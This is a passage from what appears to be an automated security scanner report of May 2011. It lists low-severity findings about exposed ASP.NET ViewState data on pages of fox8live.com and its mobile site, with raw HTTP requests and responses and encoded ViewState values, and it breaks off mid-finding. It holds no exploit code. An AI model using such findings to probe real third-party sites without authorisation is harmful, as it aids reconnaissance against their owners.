<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<meta name="descripti
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTEzOTYxNzMwOTQPZBYCZg9kFgJmD2QWAmYPZBYCZg9kFgJmD2QWAgIFD2QWAgIDD2QWAgIID2QWAgIBD2QWAgIBD2QWAgIBD2QWAgIBD2QWAmYPZBYCZg9kFgICBQ8PFgQeC18hRGF0YUJvdW5kZx4LXyFJdGVtQ291bnQCAWRkZA==" />
...[SNIP]...

8.6. http://mobile.fox8live.com/sports/default.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://mobile.fox8live.com
Path:   /sports/default.aspx

Request

GET /sports/default.aspx HTTP/1.1
Host: mobile.fox8live.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-44190619-1304954806906; AxData=; Axxd=1

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-IDMCDN: Normal:
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 15:42:11 GMT
Content-Length: 5996


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<meta name="descripti
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTE3ODc0MDQ4NTNkZA==" />
...[SNIP]...

8.7. http://mobile.fox8live.com/sports/story/Preds-try-to-stay-alive-in-Game-6-against/05o1Jx8CaEW77q1kiAhtgA.cspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://mobile.fox8live.com
Path:   /sports/story/Preds-try-to-stay-alive-in-Game-6-against/05o1Jx8CaEW77q1kiAhtgA.cspx

Request

GET /sports/story/Preds-try-to-stay-alive-in-Game-6-against/05o1Jx8CaEW77q1kiAhtgA.cspx HTTP/1.1
Host: mobile.fox8live.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-44190619-1304954806906; AxData=; Axxd=1

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-IDMCDN: Normal:
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 15:42:10 GMT
Content-Length: 9179


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<meta name="descripti
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTEzOTYxNzMwOTQPZBYCZg9kFgJmD2QWAmYPZBYCZg9kFgJmD2QWAgIFD2QWAgIDD2QWAgIID2QWAgIBD2QWAgIBD2QWAgIBD2QWAgIBD2QWAmYPZBYCZg9kFgICBQ8PFgQeC18hRGF0YUJvdW5kZx4LXyFJdGVtQ291bnQCAWRkZA==" />
...[SNIP]...

8.8. http://mobile.fox8live.com/weather/default.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://mobile.fox8live.com
Path:   /weather/default.aspx

Request

GET /weather/default.aspx HTTP/1.1
Host: mobile.fox8live.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-44190619-1304954806906; AxData=; Axxd=1

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-IDMCDN: Normal:
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 15:42:07 GMT
Content-Length: 9343


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<meta name="descripti
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTE4NTk2NTQzOTEPZBYCZg9kFgJmD2QWAmYPZBYCZg9kFgJmD2QWAgIFD2QWAgIDD2QWAgIID2QWAgIBD2QWAgIBD2QWAgIBD2QWAgIBD2QWAmYPZBYEZg9kFgJmD2QWAmYPZBYCZg8PFgIeCEltYWdlVXJsBTkvbWVkaWEvZmlsZXMvY2N0dmlfd2VhdGhlci93dnVlL0V4dGVuZGVkX0ZvcmVjYXN0Lzk5OS5qcGdkZAIED2QWAmYPZBYCZg9kFgJmD2QWBAIGDw8WAh4PQ29tbWFuZEFyZ3VtZW50BQEwZGQCBw8PFgIfAQUBNmRkGAEFaGN0bDAwJGN0bDAwJGN0bDAwJGN0bDAwJGN0bDAwJENvbW1vblBhZ2UkQ29tbW9uQm9keSRDb21tb25Db250ZW50JENvbW1vbkxlZnRDb2x1bW4kTWFpbiRjdGwwMCRfJEZvcmVjYXN0DxQrAAJkZmQ=" />
...[SNIP]...

8.9. http://www.fox8live.com/business/default.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.fox8live.com
Path:   /business/default.aspx

Request

GET /business/default.aspx HTTP/1.1
Host: www.fox8live.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-44190619-1304954806906

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:36:53 GMT
Server: PWS/1.7.2.1
X-Px: ht iad-agg-n30.panthercdn.com
Cache-Control: max-age=120
Expires: Mon, 09 May 2011 15:38:53 GMT
Age: 0
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Px-Uncompress-Origin: 28256
Connection: keep-alive
Content-Length: 28256


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<meta name="descripti
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUJOTM5OTY3NjE3D2QWAmYPZBYCZg9kFgJmD2QWAmYPZBYCZg9kFgICBQ9kFgICAw9kFgICGw9kFgJmD2QWBgIBDxAPZBYCHghvbkNoYW5nZQWAAWRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCdjdGwwMF9jdGwwMF9jdGwwMF9jdGwwMF9jdGwwMF9Db21tb25QYWdlX1NlYXJjaEJhcl9fX1Bvd2VyZWRCeScpLnNyYyA9IHRoaXNbdGhpcy5zZWxlY3RlZEluZGV4XS5pbWdVcmw7DxYCZgIBFgIQBRBTZWFyY2ggVGhpcyBTaXRlBQMyNjVnEAUOU2VhcmNoIHRoZSBXZWIFAzI2NmdkZAIDDw9kFgIeCm9ua2V5cHJlc3MFYHJldHVybiBJRE1UZXh0Qm94S2V5UHJlc3MoZXZlbnQsICdjdGwwMF9jdGwwMF9jdGwwMF9jdGwwMF9jdGwwMF9Db21tb25QYWdlX1NlYXJjaEJhcl9fX1NlYXJjaCcpO2QCBw8PFgIeCEltYWdlVXJsBRcvaW1hZ2VzL3RyYW5zcGFyZW50LmdpZmRkGAEFa2N0bDAwJGN0bDAwJGN0bDAwJGN0bDAwJGN0bDAwJENvbW1vblBhZ2UkQ29tbW9uQm9keSRDb21tb25Db250ZW50JENvbW1vbkxlZnRDb2x1bW4kTWFpbiRjdGwwMiRfJGN0bDAwJGN0bDAyDxQrAAJkZmQ=" />
...[SNIP]...

8.10. http://www.fox8live.com/business/iframe_financialticker.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.fox8live.com
Path:   /business/iframe_financialticker.aspx

Request

GET /business/iframe_financialticker.aspx HTTP/1.1
Host: www.fox8live.com
Proxy-Connection: keep-alive
Referer: http://www.fox8live.com/business/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uts=12; __qca=P0-44190619-1304954806906

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:37:02 GMT
Server: PWS/1.7.2.1
X-Px: ht iad-agg-n30.panthercdn.com
Cache-Control: max-age=121
Expires: Mon, 09 May 2011 15:39:02 GMT
Age: 1
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Px-Uncompress-Origin: 5216
Connection: keep-alive
Content-Length: 5216


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<meta name="descripti
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTE4NzE0MzUyNTdkZA==" />
...[SNIP]...

8.11. http://www.fox8live.com/business/iframe_indexwatch.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.fox8live.com
Path:   /business/iframe_indexwatch.aspx

Request

GET /business/iframe_indexwatch.aspx HTTP/1.1
Host: www.fox8live.com
Proxy-Connection: keep-alive
Referer: http://www.fox8live.com/business/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uts=12; __qca=P0-44190619-1304954806906

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:37:04 GMT
Server: PWS/1.7.2.1
X-Px: ht iad-agg-n30.panthercdn.com
Cache-Control: max-age=120
Expires: Mon, 09 May 2011 15:39:00 GMT
Age: 4
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Px-Uncompress-Origin: 5204
Connection: keep-alive
Content-Length: 5204


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<meta name="descripti
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTE4NzE0MzUyNTdkZA==" />
...[SNIP]...

8.12. http://www.fox8live.com/content/aboutus/default.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.fox8live.com
Path:   /content/aboutus/default.aspx

Request

GET /content/aboutus/default.aspx HTTP/1.1
Host: www.fox8live.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-44190619-1304954806906; AxData=; Axxd=1

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:39:34 GMT
Server: PWS/1.7.2.1
X-Px: ht iad-agg-n30.panthercdn.com
Cache-Control: max-age=121
Expires: Mon, 09 May 2011 15:40:52 GMT
Age: 43
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Px-Uncompress-Origin: 29278
Connection: keep-alive
Content-Length: 29278


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<meta name="descripti
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTE3Mjc5MTA3MTUPZBYCZg9kFgJmD2QWAmYPZBYCZg9kFgJmD2QWAgIFD2QWAgIDD2QWAgIbD2QWAmYPZBYGAgEPEA9kFgIeCG9uQ2hhbmdlBYABZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoJ2N0bDAwX2N0bDAwX2N0bDAwX2N0bDAwX2N0bDAwX0NvbW1vblBhZ2VfU2VhcmNoQmFyX19fUG93ZXJlZEJ5Jykuc3JjID0gdGhpc1t0aGlzLnNlbGVjdGVkSW5kZXhdLmltZ1VybDsPFgJmAgEWAhAFEFNlYXJjaCBUaGlzIFNpdGUFAzI2NWcQBQ5TZWFyY2ggdGhlIFdlYgUDMjY2Z2RkAgMPD2QWAh4Kb25rZXlwcmVzcwVgcmV0dXJuIElETVRleHRCb3hLZXlQcmVzcyhldmVudCwgJ2N0bDAwX2N0bDAwX2N0bDAwX2N0bDAwX2N0bDAwX0NvbW1vblBhZ2VfU2VhcmNoQmFyX19fU2VhcmNoJyk7ZAIHDw8WAh4ISW1hZ2VVcmwFFy9pbWFnZXMvdHJhbnNwYXJlbnQuZ2lmZGQYAQVhY3RsMDAkY3RsMDAkY3RsMDAkY3RsMDAkY3RsMDAkQ29tbW9uUGFnZSRDb21tb25Cb2R5JENvbW1vbkNvbnRlbnQkQ29tbW9uUmlnaHRDb2x1bW4kY3RsMDIkXyRjdGwwMA8UKwACZGZk" />
...[SNIP]...

8.13. http://www.fox8live.com/content/news/lee_zurik_investigation/default.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.fox8live.com
Path:   /content/news/lee_zurik_investigation/default.aspx

Request

GET /content/news/lee_zurik_investigation/default.aspx HTTP/1.1
Host: www.fox8live.com
Proxy-Connection: keep-alive
Referer: http://www.fox8live.com/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-44190619-1304954806906; AxData=; Axxd=1; uts=12; poll_d71e7e2a-acae-43ec-bfe0-b7d3e938b303=novote

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:39:44 GMT
Server: PWS/1.7.2.1
X-Px: ht iad-agg-n30.panthercdn.com
Cache-Control: max-age=120
Expires: Mon, 09 May 2011 15:41:05 GMT
Age: 39
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Px-Uncompress-Origin: 40317
Connection: keep-alive
Content-Length: 40317


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<meta name="descripti
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTQ3NzI1NDU2MA9kFgJmD2QWAmYPZBYCZg9kFgJmD2QWAmYPZBYCAgUPZBYCAgMPZBYCAhsPZBYCZg9kFgYCAQ8QD2QWAh4Ib25DaGFuZ2UFgAFkb2N1bWVudC5nZXRFbGVtZW50QnlJZCgnY3RsMDBfY3RsMDBfY3RsMDBfY3RsMDBfY3RsMDBfQ29tbW9uUGFnZV9TZWFyY2hCYXJfX19Qb3dlcmVkQnknKS5zcmMgPSB0aGlzW3RoaXMuc2VsZWN0ZWRJbmRleF0uaW1nVXJsOw8WAmYCARYCEAUQU2VhcmNoIFRoaXMgU2l0ZQUDMjY1ZxAFDlNlYXJjaCB0aGUgV2ViBQMyNjZnZGQCAw8PZBYCHgpvbmtleXByZXNzBWByZXR1cm4gSURNVGV4dEJveEtleVByZXNzKGV2ZW50LCAnY3RsMDBfY3RsMDBfY3RsMDBfY3RsMDBfY3RsMDBfQ29tbW9uUGFnZV9TZWFyY2hCYXJfX19TZWFyY2gnKTtkAgcPDxYCHghJbWFnZVVybAUXL2ltYWdlcy90cmFuc3BhcmVudC5naWZkZBgBBWFjdGwwMCRjdGwwMCRjdGwwMCRjdGwwMCRjdGwwMCRDb21tb25QYWdlJENvbW1vbkJvZHkkQ29tbW9uQ29udGVudCRDb21tb25SaWdodENvbHVtbiRjdGwwMiRfJGN0bDAwDxQrAAJkZmQ=" />
...[SNIP]...

8.14. http://www.fox8live.com/content/news/seregni/default.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.fox8live.com
Path:   /content/news/seregni/default.aspx

Request

GET /content/news/seregni/default.aspx HTTP/1.1
Host: www.fox8live.com
Proxy-Connection: keep-alive
Referer: http://www.fox8live.com/content/news/lee_zurik_investigation/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-44190619-1304954806906; AxData=; Axxd=1; uts=12; poll_d71e7e2a-acae-43ec-bfe0-b7d3e938b303=novote

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:39:44 GMT
Server: PWS/1.7.2.1
X-Px: ht iad-agg-n30.panthercdn.com
Cache-Control: max-age=120
Expires: Mon, 09 May 2011 15:41:08 GMT
Age: 36
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Px-Uncompress-Origin: 43733
Connection: keep-alive
Content-Length: 43733


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<meta name="descripti
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTU4ODI2NDc4OA9kFgJmD2QWAmYPZBYCZg9kFgJmD2QWAmYPZBYCAgUPZBYCAgMPZBYCAhsPZBYCZg9kFgYCAQ8QD2QWAh4Ib25DaGFuZ2UFgAFkb2N1bWVudC5nZXRFbGVtZW50QnlJZCgnY3RsMDBfY3RsMDBfY3RsMDBfY3RsMDBfY3RsMDBfQ29tbW9uUGFnZV9TZWFyY2hCYXJfX19Qb3dlcmVkQnknKS5zcmMgPSB0aGlzW3RoaXMuc2VsZWN0ZWRJbmRleF0uaW1nVXJsOw8WAmYCARYCEAUQU2VhcmNoIFRoaXMgU2l0ZQUDMjY1ZxAFDlNlYXJjaCB0aGUgV2ViBQMyNjZnZGQCAw8PZBYCHgpvbmtleXByZXNzBWByZXR1cm4gSURNVGV4dEJveEtleVByZXNzKGV2ZW50LCAnY3RsMDBfY3RsMDBfY3RsMDBfY3RsMDBfY3RsMDBfQ29tbW9uUGFnZV9TZWFyY2hCYXJfX19TZWFyY2gnKTtkAgcPDxYCHghJbWFnZVVybAUXL2ltYWdlcy90cmFuc3BhcmVudC5naWZkZGQ=" />
...[SNIP]...

8.15. http://www.fox8live.com/content/news/watercooler/default.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.fox8live.com
Path:   /content/news/watercooler/default.aspx

Request

GET /content/news/watercooler/default.aspx HTTP/1.1
Host: www.fox8live.com
Proxy-Connection: keep-alive
Referer: http://www.fox8live.com/content/news/seregni/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-44190619-1304954806906; AxData=; Axxd=1; uts=12; poll_d71e7e2a-acae-43ec-bfe0-b7d3e938b303=novote

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:41:27 GMT
Server: PWS/1.7.2.1
X-Px: ht iad-agg-n30.panthercdn.com
Cache-Control: max-age=120
Expires: Mon, 09 May 2011 15:43:27 GMT
Age: 0
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Px-Uncompress-Origin: 27624
Connection: keep-alive
Content-Length: 27624


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<meta name="descripti
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTQ3NzI1NDU2MA9kFgJmD2QWAmYPZBYCZg9kFgJmD2QWAmYPZBYCAgUPZBYCAgMPZBYCAhsPZBYCZg9kFgYCAQ8QD2QWAh4Ib25DaGFuZ2UFgAFkb2N1bWVudC5nZXRFbGVtZW50QnlJZCgnY3RsMDBfY3RsMDBfY3RsMDBfY3RsMDBfY3RsMDBfQ29tbW9uUGFnZV9TZWFyY2hCYXJfX19Qb3dlcmVkQnknKS5zcmMgPSB0aGlzW3RoaXMuc2VsZWN0ZWRJbmRleF0uaW1nVXJsOw8WAmYCARYCEAUQU2VhcmNoIFRoaXMgU2l0ZQUDMjY1ZxAFDlNlYXJjaCB0aGUgV2ViBQMyNjZnZGQCAw8PZBYCHgpvbmtleXByZXNzBWByZXR1cm4gSURNVGV4dEJveEtleVByZXNzKGV2ZW50LCAnY3RsMDBfY3RsMDBfY3RsMDBfY3RsMDBfY3RsMDBfQ29tbW9uUGFnZV9TZWFyY2hCYXJfX19TZWFyY2gnKTtkAgcPDxYCHghJbWFnZVVybAUXL2ltYWdlcy90cmFuc3BhcmVudC5naWZkZGQ=" />
...[SNIP]...

8.16. http://www.fox8live.com/default.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.fox8live.com
Path:   /default.aspx

Request

GET /default.aspx HTTP/1.1
Host: www.fox8live.com
Proxy-Connection: keep-alive
Referer: http://www.fox8live.com/news/local/story/St-Bernard-prepares-for-rising-Mississippi-River/vJUO9a9n60iNAXZ6QCm2oQ.cspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-44190619-1304954806906; AxData=; Axxd=1

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:39:34 GMT
Server: PWS/1.7.2.1
X-Px: rf-ms iad-agg-n30 ( iad-agg-n22), ht iad-agg-n22.panthercdn.com
Cache-Control: max-age=120
Expires: Mon, 09 May 2011 15:40:50 GMT
Age: 44
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Px-Uncompress-Origin: 102042
Connection: keep-alive
Content-Length: 102042


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<meta name="descripti
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTE2NTE4MTM1MjMPZBYCZg9kFgJmD2QWAmYPZBYCAgUPZBYCAgMPZBYEAhsPZBYCZg9kFgYCAQ8QD2QWAh4Ib25DaGFuZ2UFdGRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCdjdGwwMF9jdGwwMF9jdGwwMF9Db21tb25QYWdlX1NlYXJjaEJhcl9fX1Bvd2VyZWRCeScpLnNyYyA9IHRoaXNbdGhpcy5zZWxlY3RlZEluZGV4XS5pbWdVcmw7DxYCZgIBFgIQBRBTZWFyY2ggVGhpcyBTaXRlBQMyNjVnEAUOU2VhcmNoIHRoZSBXZWIFAzI2NmdkZAIDDw9kFgIeCm9ua2V5cHJlc3MFVHJldHVybiBJRE1UZXh0Qm94S2V5UHJlc3MoZXZlbnQsICdjdGwwMF9jdGwwMF9jdGwwMF9Db21tb25QYWdlX1NlYXJjaEJhcl9fX1NlYXJjaCcpO2QCBw8PFgIeCEltYWdlVXJsBRcvaW1hZ2VzL3RyYW5zcGFyZW50LmdpZmRkAicPZBYCAgMPZBYCAgIPZBYCZg9kFgICAQ9kFgRmD2QWAmYPZBYCZg9kFgJmD2QWAmYPZBYCZg9kFgICBQ8WAh4HT25DbGljawXUA3siQW5pbWF0aW9uTmFtZSI6IlNlcXVlbmNlIiwiQW5pbWF0aW9uQ2hpbGRyZW4iOlt7IkFuaW1hdGlvbk5hbWUiOiJTY3JpcHRBY3Rpb24iLCJTY3JpcHQiOiJzdGFydEZhZGUoKTsiLCJBbmltYXRpb25DaGlsZHJlbiI6W119LHsiQW5pbWF0aW9uTmFtZSI6IlNjcmlwdEFjdGlvbiIsIlNjcmlwdCI6ImF1dG9TZWxlY3RTbGlkZSgpOyIsIkFuaW1hdGlvbkNoaWxkcmVuIjpbXX0seyJBbmltYXRpb25OYW1lIjoiUGFyYWxsZWwiLCJEdXJhdGlvbiI6Ii41IiwiRnBzIjoiMTUiLCJBbmltYXRpb25DaGlsZHJlbiI6W3siQW5pbWF0aW9uTmFtZSI6IkZhZGVPdXQiLCJBbmltYXRpb25UYXJnZXQiOiJzbGlkZURpc3BsYXlGYWRlT3V0IiwiQW5pbWF0aW9uQ2hpbGRyZW4iOltdfSx7IkFuaW1hdGlvbk5hbWUiOiJGYWRlSW4iLCJBbmltYXRpb25UYXJnZXQiOiJzbGlkZURpc3BsYXkiLCJBbmltYXRpb25DaGlsZHJlbiI6W119XX1dfWQCAQ9kFgJmD2QWAmYPZBYCZg9kFgJmD2QWAgIBDw8WAh4HVmlzaWJsZWhkZBgDBW5jdGwwMCRjdGwwMCRjdGwwMCRDb21tb25QYWdlJENvbW1vbkJvZHkkTUMkY3RsMDEkU1BDMiRjdGwwMCRjdGwwMCRjdGwwMCRfJFNsaWRlc2hvd01haW4kXyRjdGwwMiRfJGhlYWRsaW5lVmlldw8PZGZkBW5jdGwwMCRjdGwwMCRjdGwwMCRDb21tb25QYWdlJENvbW1vbkJvZHkkTUMkY3RsMDEkU1BDMiRjdGwwMCRjdGwwMCRjdGwwMCRfJFNsaWRlc2hvd01haW4kXyRjdGwwMSRfJGhlYWRsaW5lVmlldw8PZGZkBW5jdGwwMCRjdGwwMCRjdGwwMCRDb21tb25QYWdlJENvbW1vbkJvZHkkTUMkY3RsMDEkU1BDMiRjdGwwMCRjdGwwMCRjdGwwMCRfJFNsaWRlc2hvd01haW4kXyRjdGwwMCRfJGhlYWRsaW5lVmlldw8PZGZk" />
...[SNIP]...

8.17. http://www.fox8live.com/entertainment/horoscopes/default.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.fox8live.com
Path:   /entertainment/horoscopes/default.aspx

Request

GET /entertainment/horoscopes/default.aspx HTTP/1.1
Host: www.fox8live.com
Proxy-Connection: keep-alive
Referer: http://www.fox8live.com/content/aboutus/default.aspx
